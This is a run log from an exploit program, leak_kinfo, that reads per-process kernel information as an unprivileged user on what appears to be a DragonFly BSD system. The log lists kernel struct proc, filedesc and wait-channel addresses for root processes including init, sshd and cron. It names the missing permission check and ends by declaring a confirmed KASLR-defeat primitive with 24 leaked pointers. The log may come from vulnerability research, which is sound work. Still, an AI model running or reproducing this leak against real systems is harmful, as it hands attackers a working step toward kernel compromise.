DF-0016 / run.log
running as uid=1001 (./leak_kinfo); self pid=1843
reading kern.proc.pid.<pid> (KERN_PROC_PID -> PRISON_CHECK only, no p_trespass gate)
pid 1843 uid=1001 comm=leak_kinfo
kp_paddr = 0xfffff80066808280 (struct proc slab)
kp_fd = 0xfffff80066848940 (filedesc slab)
kl_wchan = 0x0000000000000000
kp_ktaddr = 0x0000000000000000
pid 1 uid=0 comm=init
kp_paddr = 0xfffff80066807880 (struct proc slab)
kp_fd = 0xfffff80066840ec0 (filedesc slab)
kl_wchan = 0xfffff80066807880 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 68 uid=0 comm=hammer2
kp_paddr = 0xfffff800ab143280 (struct proc slab)
kp_fd = 0xfffff800ab163c40 (filedesc slab)
kl_wchan = 0xfffff80065c799f8 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 285 uid=0 comm=dhclient
kp_paddr = 0xfffff8006680c880 (struct proc slab)
kp_fd = 0xfffff8006684c140 (filedesc slab)
kl_wchan = 0xfffff8006680c880 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 328 uid=0 comm=devd
kp_paddr = 0xfffff800ab144180 (struct proc slab)
kp_fd = 0xfffff800ab1669c0 (filedesc slab)
kl_wchan = 0xfffff80067a5dff8 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 411 uid=0 comm=syslogd
kp_paddr = 0xfffff800ab145080 (struct proc slab)
kp_fd = 0xfffff800ab167b40 (filedesc slab)
kl_wchan = 0xfffff80067a5e778 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 699 uid=0 comm=sshd
kp_paddr = 0xfffff800ab144b80 (struct proc slab)
kp_fd = 0xfffff800ab1677c0 (filedesc slab)
kl_wchan = 0xfffff80067a5e4f8 (wait channel)
kp_ktaddr = 0x0000000000000000
pid 730 uid=0 comm=cron
kp_paddr = 0xfffff800ab144680 (struct proc slab)
kp_fd = 0xfffff800ab16a540 (filedesc slab)
kl_wchan = 0xffffffff8130f670 (wait channel)
kp_ktaddr = 0x0000000000000000
=== stability check: read pid 1 three times, kp_paddr must match ===
pid 1 kp_paddr: 0xfffff80066807880 / 0xfffff80066807880 / 0xfffff80066807880 (STABLE = real struct proc address)
result: 24 kernel pointers leaked across 8 processes
result: LEAK CONFIRMED (KASLR-defeat / slab-address primitive)
RUN_EXIT=0